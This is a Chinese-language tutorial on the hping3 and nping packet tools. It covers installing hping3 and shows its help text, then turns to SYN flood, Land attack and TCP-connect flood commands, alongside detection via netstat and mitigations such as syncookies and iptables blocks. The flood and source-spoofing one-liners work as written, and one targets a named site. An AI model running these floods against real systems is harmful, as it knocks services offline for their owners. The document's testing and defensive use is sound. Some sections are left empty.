http://www.hping.org
http://wiki.hping.org/home
http://wiki.hping.org/94
https://github.com/antirez/hping
http://0daysecurity.com/articles/hping3_examples.html

hping是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是hping3，支持使用tcl脚本自动化地调用其API。
hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。

1.安装方法
可以下载压缩包或者从GitHub上下载编译安装

mac下安装:
shell> git clone https://github.com/antirez/hping.git
shell> cd hping
shell> ./configure
shell> make
shell> cp hping3 /usr/local/bin/hping3
shell> hping3 --help
usage: hping host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood	   sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
      
2.SYN Flooding攻击
产生SYN Flooding攻击的明显特征是接口(网关)发送和接收数据大幅度上升!!而CPU、内存和磁盘IO不会有明显的变化。
使用命令netstat -i -c查看网卡的RX-OK和TX-OK包跟正常情况相比大幅度上升，也可以用netstat -s查看接收包信息

例如模拟SYN Flooding攻击:
shell> sudo hping3 -V -c 100 -d 120 -S -w 64 -p 80 --flood ip

应急处理:
shell> sysctl -w net.ipv4.tcp_synack_retries=0 //平时可以设置为1或者2
shell> netstat -na | grep -i SYN_RECV | more
利用iptables临时封掉最大嫌疑攻击的IP或IP号段，例如对方假冒173.*.*.*号段来攻击，
短期禁用173.*.*.*这个大号段（要确认小心不要封掉自己的本地IP了！）
# iptables -A INPUT -s 173.0.0.0/8  -p tcp  –dport 80 -j DROP
这样应急处理很容易误伤，甚至可能因为封错了导致ssh登陆不了服务器，并不是理想方式。

内核防护:
对于SYN flood攻击内核参数调整
增大net.ipv4.tcp_max_syn_backlog和net.core.somaxconn
减小net.ipv4.tcp_synack_retries 必要的时候可以设置为0
启用net.ipv4.tcp_syncookies

防护墙防护:

3.DOS Land Attack，Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接
http://0daysecurity.com/articles/hping3_examples.html

shell> sudo hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood -a ip地址 --rand-source VICTIM_IP ip地址
--flood: sent packets as fast as possible. Don't show replies.
--rand-dest: random destionation address mode. see the man.
-V <-- Verbose
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)

使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。
shell> sudo hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

~ sudo nping -c 1 --tcp -p 80,433 192.168.242.145
Password:

4.nping - Network packet generation tool / ping utility

Starting Nping 0.7.70 ( https://nmap.org/nping ) at 2018-06-07 16:58 CST
SENT (0.0139s) TCP 192.168.242.1:64094 > 192.168.242.145:80 S ttl=64 id=823 iplen=40  seq=248962105 win=1480
RCVD (0.0145s) TCP 192.168.242.145:80 > 192.168.242.1:64094 RA ttl=64 id=64012 iplen=40  seq=0 win=0
SENT (1.0152s) TCP 192.168.242.1:64094 > 192.168.242.145:433 S ttl=64 id=823 iplen=40  seq=248962105 win=1480
RCVD (1.0157s) TCP 192.168.242.145:433 > 192.168.242.1:64094 RA ttl=64 id=64065 iplen=40  seq=0 win=0

Max rtt: 0.494ms | Min rtt: 0.350ms | Avg rtt: 0.422ms
Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%)

TCP连接攻击：
# nping --tcp-connect -rate=90000 -c 900000 -q testsite.com

5.

